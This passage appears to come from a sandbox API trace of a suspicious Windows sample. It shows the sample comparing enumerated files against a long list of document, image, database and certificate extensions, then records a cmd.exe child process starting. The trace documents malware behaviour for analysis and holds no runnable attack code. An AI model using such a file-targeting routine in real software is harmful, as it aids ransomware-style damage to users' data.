lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".dbx") returned 4 [0272.878] lstrcmpiW (lpString1=".dbx", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".dc3") returned 4 [0272.878] lstrcmpiW (lpString1=".dc3", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".dcm") returned 4 [0272.878] lstrcmpiW (lpString1=".dcm", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".dcr") returned 4 [0272.878] lstrcmpiW (lpString1=".dcr", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".der") returned 4 [0272.879] lstrcmpiW (lpString1=".der", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dib") returned 4 [0272.879] lstrcmpiW (lpString1=".dib", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dic") returned 4 [0272.879] lstrcmpiW (lpString1=".dic", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dif") returned 4 [0272.879] lstrcmpiW (lpString1=".dif", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".divx") returned 5 [0272.879] lstrcmpiW (lpString1=".divx", lpString2="t.png") returned -1 [0272.879] lstrlenW (lpString=".djvu") returned 5 [0272.879] lstrcmpiW (lpString1=".djvu", lpString2="t.png") returned -1 [0272.879] lstrlenW (lpString=".dng") returned 4 [0272.879] lstrcmpiW (lpString1=".dng", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".doc") returned 4 [0272.879] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".docm") returned 5 [0272.879] lstrcmpiW (lpString1=".docm", lpString2="t.png") returned -1 [0272.879] lstrlenW (lpString=".docx") returned 5 [0272.879] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0272.879] lstrlenW (lpString=".dot") returned 4 [0272.879] lstrcmpiW (lpString1=".dot", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dotm") returned 5 [0272.879] lstrcmpiW (lpString1=".dotm", lpString2="t.png") returned -1 [0272.879] lstrlenW (lpString=".dotx") returned 5 [0272.879] lstrcmpiW (lpString1=".dotx", lpString2="t.png") returned -1 [0272.879] lstrlenW (lpString=".dpx") returned 4 [0272.879] lstrcmpiW (lpString1=".dpx", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dqy") returned 4 [0272.879] lstrcmpiW (lpString1=".dqy", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dsn") returned 4 [0272.879] lstrcmpiW (lpString1=".dsn", lpString2=".png") returned -1 [0272.879] lstrlenW (lpString=".dt") returned 3 [0272.879] lstrcmpiW (lpString1=".dt", lpString2="png") returned -1 [0272.879] lstrlenW (lpString=".dtd") returned 4 [0272.880] lstrcmpiW (lpString1=".dtd", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".dwg") returned 4 [0272.880] lstrcmpiW (lpString1=".dwg", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".dwt") returned 4 [0272.880] lstrcmpiW (lpString1=".dwt", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".dx") returned 3 [0272.880] lstrcmpiW (lpString1=".dx", lpString2="png") returned -1 [0272.880] lstrlenW (lpString=".dxf") returned 4 [0272.880] lstrcmpiW (lpString1=".dxf", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".edml") returned 5 [0272.880] lstrcmpiW (lpString1=".edml", lpString2="t.png") returned -1 [0272.880] lstrlenW (lpString=".efd") returned 4 [0272.880] lstrcmpiW (lpString1=".efd", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".elf") returned 4 [0272.880] lstrcmpiW (lpString1=".elf", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".emf") returned 4 [0272.880] lstrcmpiW (lpString1=".emf", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".emz") returned 4 [0272.880] lstrcmpiW (lpString1=".emz", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".epf") returned 4 [0272.880] lstrcmpiW (lpString1=".epf", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".eps") returned 4 [0272.880] lstrcmpiW (lpString1=".eps", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".epsf") returned 5 [0272.880] lstrcmpiW (lpString1=".epsf", lpString2="t.png") returned -1 [0272.880] lstrlenW (lpString=".epsp") returned 5 [0272.880] lstrcmpiW (lpString1=".epsp", lpString2="t.png") returned -1 [0272.880] lstrlenW (lpString=".erf") returned 4 [0272.880] lstrcmpiW (lpString1=".erf", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".exr") returned 4 [0272.880] lstrcmpiW (lpString1=".exr", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".f4v") returned 4 [0272.880] lstrcmpiW (lpString1=".f4v", lpString2=".png") returned -1 [0272.880] lstrlenW (lpString=".fido") returned 5 [0272.880] lstrcmpiW (lpString1=".fido", lpString2="t.png") returned -1 [0272.880] lstrlenW (lpString=".flm") returned 4 [0272.880] lstrcmpiW (lpString1=".flm", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".flv") returned 4 [0272.881] lstrcmpiW (lpString1=".flv", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".frm") returned 4 [0272.881] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".fxg") returned 4 [0272.881] lstrcmpiW (lpString1=".fxg", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".geo") returned 4 [0272.881] lstrcmpiW (lpString1=".geo", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".gif") returned 4 [0272.881] lstrcmpiW (lpString1=".gif", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".grs") returned 4 [0272.881] lstrcmpiW (lpString1=".grs", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".gz") returned 3 [0272.881] lstrcmpiW (lpString1=".gz", lpString2="png") returned -1 [0272.881] lstrlenW (lpString=".h") returned 2 [0272.881] lstrcmpiW (lpString1=".h", lpString2="ng") returned -1 [0272.881] lstrlenW (lpString=".hdr") returned 4 [0272.881] lstrcmpiW (lpString1=".hdr", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".hpp") returned 4 [0272.881] lstrcmpiW (lpString1=".hpp", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".hta") returned 4 [0272.881] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".htc") returned 4 [0272.881] lstrcmpiW (lpString1=".htc", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".htm") returned 4 [0272.881] lstrcmpiW (lpString1=".htm", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".html") returned 5 [0272.881] lstrcmpiW (lpString1=".html", lpString2="t.png") returned -1 [0272.881] lstrlenW (lpString=".icb") returned 4 [0272.881] lstrcmpiW (lpString1=".icb", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".ics") returned 4 [0272.881] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".iff") returned 4 [0272.881] lstrcmpiW (lpString1=".iff", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".inc") returned 4 [0272.881] lstrcmpiW (lpString1=".inc", lpString2=".png") returned -1 [0272.881] lstrlenW (lpString=".indd") returned 5 [0272.881] lstrcmpiW (lpString1=".indd", lpString2="t.png") returned -1 [0272.881] lstrlenW (lpString=".ini") returned 4 [0272.882] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".iqy") returned 4 [0272.882] lstrcmpiW (lpString1=".iqy", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".j2c") returned 4 [0272.882] lstrcmpiW (lpString1=".j2c", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".j2k") returned 4 [0272.882] lstrcmpiW (lpString1=".j2k", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".java") returned 5 [0272.882] lstrcmpiW (lpString1=".java", lpString2="t.png") returned -1 [0272.882] lstrlenW (lpString=".jp2") returned 4 [0272.882] lstrcmpiW (lpString1=".jp2", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".jpc") returned 4 [0272.882] lstrcmpiW (lpString1=".jpc", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".jpe") returned 4 [0272.882] lstrcmpiW (lpString1=".jpe", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".jpeg") returned 5 [0272.882] lstrcmpiW (lpString1=".jpeg", lpString2="t.png") returned -1 [0272.882] lstrlenW (lpString=".jpf") returned 4 [0272.882] lstrcmpiW (lpString1=".jpf", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".jpg") returned 4 [0272.882] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".jpx") returned 4 [0272.882] lstrcmpiW (lpString1=".jpx", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".js") returned 3 [0272.882] lstrcmpiW (lpString1=".js", lpString2="png") returned -1 [0272.882] lstrlenW (lpString=".jsf") returned 4 [0272.882] lstrcmpiW (lpString1=".jsf", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".json") returned 5 [0272.882] lstrcmpiW (lpString1=".json", lpString2="t.png") returned -1 [0272.882] lstrlenW (lpString=".jsp") returned 4 [0272.882] lstrcmpiW (lpString1=".jsp", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".kdc") returned 4 [0272.882] lstrcmpiW (lpString1=".kdc", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".kmz") returned 4 [0272.882] lstrcmpiW (lpString1=".kmz", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".kwm") returned 4 [0272.882] lstrcmpiW (lpString1=".kwm", lpString2=".png") returned -1 [0272.882] lstrlenW (lpString=".lasso") returned 6 [0272.883] lstrcmpiW (lpString1=".lasso", lpString2="xt.png") returned -1 [0272.883] lstrlenW (lpString=".lbi") returned 4 [0272.883] lstrcmpiW (lpString1=".lbi", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".lgf") returned 4 [0272.883] lstrcmpiW (lpString1=".lgf", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".lgp") returned 4 [0272.883] lstrcmpiW (lpString1=".lgp", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".log") returned 4 [0272.883] lstrcmpiW (lpString1=".log", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".m1v") returned 4 [0272.883] lstrcmpiW (lpString1=".m1v", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".m4a") returned 4 [0272.883] lstrcmpiW (lpString1=".m4a", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".m4v") returned 4 [0272.883] lstrcmpiW (lpString1=".m4v", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".max") returned 4 [0272.883] lstrcmpiW (lpString1=".max", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".md") returned 3 [0272.883] lstrcmpiW (lpString1=".md", lpString2="png") returned -1 [0272.883] lstrlenW (lpString=".mda") returned 4 [0272.883] lstrcmpiW (lpString1=".mda", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mdb") returned 4 [0272.883] lstrcmpiW (lpString1=".mdb", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mde") returned 4 [0272.883] lstrcmpiW (lpString1=".mde", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mdf") returned 4 [0272.883] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mdw") returned 4 [0272.883] lstrcmpiW (lpString1=".mdw", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mef") returned 4 [0272.883] lstrcmpiW (lpString1=".mef", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mft") returned 4 [0272.883] lstrcmpiW (lpString1=".mft", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mfw") returned 4 [0272.883] lstrcmpiW (lpString1=".mfw", lpString2=".png") returned -1 [0272.883] lstrlenW (lpString=".mht") returned 4 [0272.884] lstrcmpiW (lpString1=".mht", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mhtml") returned 6 [0272.884] lstrcmpiW (lpString1=".mhtml", lpString2="xt.png") returned -1 [0272.884] lstrlenW (lpString=".mka") returned 4 [0272.884] lstrcmpiW (lpString1=".mka", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mkidx") returned 6 [0272.884] lstrcmpiW (lpString1=".mkidx", lpString2="xt.png") returned -1 [0272.884] lstrlenW (lpString=".mkv") returned 4 [0272.884] lstrcmpiW (lpString1=".mkv", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mos") returned 4 [0272.884] lstrcmpiW (lpString1=".mos", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mov") returned 4 [0272.884] lstrcmpiW (lpString1=".mov", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mp3") returned 4 [0272.884] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mp4") returned 4 [0272.884] lstrcmpiW (lpString1=".mp4", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mpeg") returned 5 [0272.884] lstrcmpiW (lpString1=".mpeg", lpString2="t.png") returned -1 [0272.884] lstrlenW (lpString=".mpg") returned 4 [0272.884] lstrcmpiW (lpString1=".mpg", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mpv") returned 4 [0272.884] lstrcmpiW (lpString1=".mpv", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mrw") returned 4 [0272.884] lstrcmpiW (lpString1=".mrw", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".msg") returned 4 [0272.884] lstrcmpiW (lpString1=".msg", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".mxl") returned 4 [0272.884] lstrcmpiW (lpString1=".mxl", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".myd") returned 4 [0272.884] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".myi") returned 4 [0272.884] lstrcmpiW (lpString1=".myi", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".nef") returned 4 [0272.884] lstrcmpiW (lpString1=".nef", lpString2=".png") returned -1 [0272.884] lstrlenW (lpString=".nrw") returned 4 [0272.884] lstrcmpiW (lpString1=".nrw", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".obj") returned 4 [0272.885] lstrcmpiW (lpString1=".obj", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".odb") returned 4 [0272.885] lstrcmpiW (lpString1=".odb", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".odc") returned 4 [0272.885] lstrcmpiW (lpString1=".odc", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".odm") returned 4 [0272.885] lstrcmpiW (lpString1=".odm", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".odp") returned 4 [0272.885] lstrcmpiW (lpString1=".odp", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".ods") returned 4 [0272.885] lstrcmpiW (lpString1=".ods", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".oft") returned 4 [0272.885] lstrcmpiW (lpString1=".oft", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".one") returned 4 [0272.885] lstrcmpiW (lpString1=".one", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".onepkg") returned 7 [0272.885] lstrcmpiW (lpString1=".onepkg", lpString2="ext.png") returned -1 [0272.885] lstrlenW (lpString=".onetoc2") returned 8 [0272.885] lstrcmpiW (lpString1=".onetoc2", lpString2="Next.png") returned -1 [0272.885] lstrlenW (lpString=".opt") returned 4 [0272.885] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".oqy") returned 4 [0272.885] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".orf") returned 4 [0272.885] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".p12") returned 4 [0272.885] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".p7b") returned 4 [0272.885] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".p7c") returned 4 [0272.885] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".pam") returned 4 [0272.885] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".pbm") returned 4 [0272.885] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".pct") returned 4 [0272.885] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0272.885] lstrlenW (lpString=".pcx") returned 4 [0272.886] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pdd") returned 4 [0272.886] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pdf") returned 4 [0272.886] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pdp") returned 4 [0272.886] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pef") returned 4 [0272.886] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pem") returned 4 [0272.886] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pff") returned 4 [0272.886] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pfm") returned 4 [0272.886] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pfx") returned 4 [0272.886] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".pgm") returned 4 [0272.886] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".php") returned 4 [0272.886] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0272.886] lstrlenW (lpString=".php3") returned 5 [0272.886] lstrcmpiW (lpString1=".php3", lpString2="t.png") returned -1 [0272.886] lstrlenW (lpString=".php4") returned 5 [0272.886] lstrcmpiW (lpString1=".php4", lpString2="t.png") returned -1 [0272.886] lstrlenW (lpString=".php5") returned 5 [0272.886] lstrcmpiW (lpString1=".php5", lpString2="t.png") returned -1 [0272.886] lstrlenW (lpString=".phtml") returned 6 [0272.886] lstrcmpiW (lpString1=".phtml", lpString2="xt.png") returned -1 [0272.886] lstrlenW (lpString=".pict") returned 5 [0272.886] lstrcmpiW (lpString1=".pict", lpString2="t.png") returned -1 [0272.886] lstrlenW (lpString=".pl") returned 3 [0272.886] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0272.886] lstrlenW (lpString=".pls") returned 4 [0272.886] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0274.583] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8052fafa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8052fafa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0274.681] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a640bd5, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x2a640bd5, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x2a640bd5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 Thread: id = 68 os_tid = 0x6b0 Thread: id = 70 os_tid = 0x6bc Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x70b79000" os_pid = "0x610" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x4f0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x614 [0263.422] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fda0 | out: lpSystemTimeAsFileTime=0x26fda0*(dwLowDateTime=0x7a4e6980, dwHighDateTime=0x1d5245c)) [0263.422] GetCurrentProcessId () returned 0x610 [0263.422] GetCurrentThreadId () returned 0x614 [0263.422] GetTickCount () returned 0x7ba4 [0263.423] QueryPerformanceCounter (in: lpPerformanceCount=0x26fda8 | out: lpPerformanceCount=0x26fda8*=7492307793) returned 1 [0263.423] GetModuleHandleW (lpModuleName=0x0) returned 0x4a160000 [0263.423] __set_app_type (_Type=0x1) [0263.424] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a187810) returned 0x0 [0263.424] __getmainargs (in: _Argc=0x4a1aa608, _Argv=0x4a1aa618, _Env=0x4a1aa610, _DoWildCard=0, _StartInfo=0x4a18e0f4 | out: _Argc=0x4a1aa608, _Argv=0x4a1aa618, _Env=0x4a1aa610) returned 0 [0263.427] GetCurrentThreadId () returned 0x614 [0263.427] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x614) returned 0x3c [0263.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76ee0000 [0263.428] GetProcAddress (hModule=0x76ee0000, lpProcName="SetThreadUILanguage") returned 0x76ef6d40 [0263.428] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0263.428] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0263.428] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd38 | out: phkResult=0x26fd38*=0x0) returned 0x2 [0263.428] VirtualQuery (in: lpAddress=0x26fd20, lpBuffer=0x26fca0, dwLength=0x30 | out: lpBuffer=0x26fca0*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0263.428] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fca0, dwLength=0x30 | out: lpBuffer=0x26fca0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0263.428] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fca0, dwLength=0x30 | out: lpBuffer=0x26fca0*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0263.428] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fca0, dwLength=0x30 | out: lpBuffer=0x26fca0*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0263.428] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fca0, dwLength=0x30 | out: lpBuffer=0x26fca0*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0263.428] GetConsoleOutputCP () returned 0x1b5 [0263.428] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0263.429] SetConsoleCtrlHandler (HandlerRoutine=0x4a183184, Add=1) returned 1 [0263.429] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.429] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0263.430] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.430] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a18e194 | out: lpMode=0x4a18e194) returned 0 [0263.431] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.431] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a18e198 | out: lpMode=0x4a18e198) returned 0 [0263.431] GetEnvironmentStringsW () returned 0x2e8aa0* [0263.431] GetProcessHeap () returned 0x2d0000 [0263.431] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xab4) returned 0x2e9560 [0263.431] FreeEnvironmentStringsW (penv=0x2e8aa0) returned 1 [0263.431] GetProcessHeap () returned 0x2d0000 [0263.431] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8) returned 0x2e8920 [0263.431] GetEnvironmentStringsW () returned 0x2e8aa0* [0263.431] GetProcessHeap () returned 0x2d0000 [0263.431] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xab4) returned 0x2ea020 [0263.431] FreeEnvironmentStringsW (penv=0x2e8aa0) returned 1 [0263.431] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ebf8 | out: phkResult=0x26ebf8*=0x44) returned 0x0 [0263.431] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x0, lpData=0x26ec10*=0x18, lpcbData=0x26ebf4*=0x1000) returned 0x2 [0263.431] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x1, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.431] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x0, lpData=0x26ec10*=0x1, lpcbData=0x26ebf4*=0x1000) returned 0x2 [0263.431] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x0, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.431] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x40, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.431] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x40, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x0, lpData=0x26ec10*=0x40, lpcbData=0x26ebf4*=0x1000) returned 0x2 [0263.432] RegCloseKey (hKey=0x44) returned 0x0 [0263.432] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ebf8 | out: phkResult=0x26ebf8*=0x44) returned 0x0 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x0, lpData=0x26ec10*=0x40, lpcbData=0x26ebf4*=0x1000) returned 0x2 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, 